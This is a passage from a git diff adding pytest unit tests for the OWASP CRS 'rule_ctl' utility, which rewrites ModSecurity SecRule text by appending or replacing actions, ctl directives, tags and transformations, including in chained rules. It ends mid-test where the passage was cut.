b/nginx/config/owasp-crs/util/rule_ctl/tests/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/helpers.py b/nginx/config/owasp-crs/util/rule_ctl/tests/helpers.py new file mode 100644 index 00000000..52829f2b --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/helpers.py @@ -0,0 +1,16 @@ +from rule_ctl import Context + +def create_context(arguments, rules_string): + context = Context() + patched_arguments = arguments + if "--config" not in arguments: + patched_arguments = arguments + ["--config", "dummy"] + context.parse_arguments(args=patched_arguments) + + for rule in context.parse_rules(rules_string): + rule.modify(context) + return context + + +def get_output(context): + return "\n".join(context.generate_output()) + "\n" diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_actions_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_actions_test.py new file mode 100644 index 00000000..f5657a3b --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_actions_test.py @@ -0,0 +1,377 @@ +from .helpers import * + +class TestAppendAction: + def test_append_action_with_no_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_existing_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc',\\ + msg:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_duplicate_action(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_action_in_correct_order(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_chain(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_skip_chain(self): + arguments = [ + "--append-action", "msg:foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceAction: + def test_replace_action_with_no_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_existing_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + log:'abc'" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_duplicate_action(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_different_name(self): + arguments = [ + "--replace-action", "msg:foo,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + arguments = [ + "--replace-action", "deny,msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:foo,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_without_values(self): + arguments = [ + "--replace-action", "pass,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + pass,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_for_any_value(self): + arguments = [ + "--replace-action", "msg,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:bar,\\ + msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_quotes(self): + arguments = [ + "--replace-action", "msg,msg:'bar'", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:'bar',\\ + msg:'bar',\\ + msg:'bar'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_skip_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_ctl_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_ctl_test.py new file mode 100644 index 00000000..efcf9052 --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_ctl_test.py @@ -0,0 +1,125 @@ +from .helpers import * + +class TestAppendControl: + def test_append_ctl_with_no_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_existing_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_duplicate_ctl(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_ctl_in_correct_order(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ver:3" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + ver:3" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_ignores_ctl_prefix(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_with_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" "ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_skip_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_tags_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_tags_test.py new file mode 100644 index 00000000..a65e66ef --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_tags_test.py @@ -0,0 +1,395 @@ +from .helpers import * + +class TestAppendTag: + def test_append_tag_with_no_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_existing_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc',\\ + tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_duplicate_tag(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo',\\ + tag:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_tag_in_correct_order(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_with_chain(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_skip_chain(self): + arguments = [ + "--append-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTag: + def test_remove_tag_with_no_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_existing_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_chain(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tag_skip_chain(self): + arguments = [ + "--remove-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRenameTag: + def test_rename_tag_with_no_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_rename_tag_with_existing_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_with_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'bar'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_skip_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestSortTags: + def test_sort_tags(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_with_chain(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_skip_chain(self): + arguments = [ + "--sort-tags", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_test.py new file mode 100644 index 00000000..f7114cea --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_test.py @@ -0,0 +1,195 @@ +from .helpers import * + +class TestFilterRuleId: + def test_filter_rule_id_exact_match(self): + arguments = [ + "--filter-rule-id", "12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_prefix_match(self): + arguments = [ + "--filter-rule-id", "^12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_suffix_match(self): + arguments = [ + "--filter-rule-id", ".*22$", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_no_match(self): + arguments = [ + "--filter-rule-id", "11", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestLineNumbers: + def test_line_numbers_identical(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" + +SecRule ARGS "@rx bar" "id:13" +""" + expected = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" + +SecRule ARGS "@rx bar" "id:13,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_line_numbers_shifted_down(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_line_numbers_shifted_up(self): + arguments = [ + "--remove-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:foo" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestTargetFile: + def test_target_file(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--target-file", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) + + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() + + def test_target_file_uses_config_as_default(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--config", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) + + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_transformations_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_transformations_test.py new file mode 100644 index 00000000..f1db898f --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_transformations_test.py @@ -0,0 +1,281 @@ +from .helpers import * + +class TestAppendTfunc: + def test_append_tfunc_with_no_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_existing_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_duplicate_transformation(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:lower,\\ + t:urlDecode" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_in_correct_order(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + log:'log',\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + t:lower,\\ + log:'log',\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_with_chain(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_skip_chain(self): + arguments = [ + "--append-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule 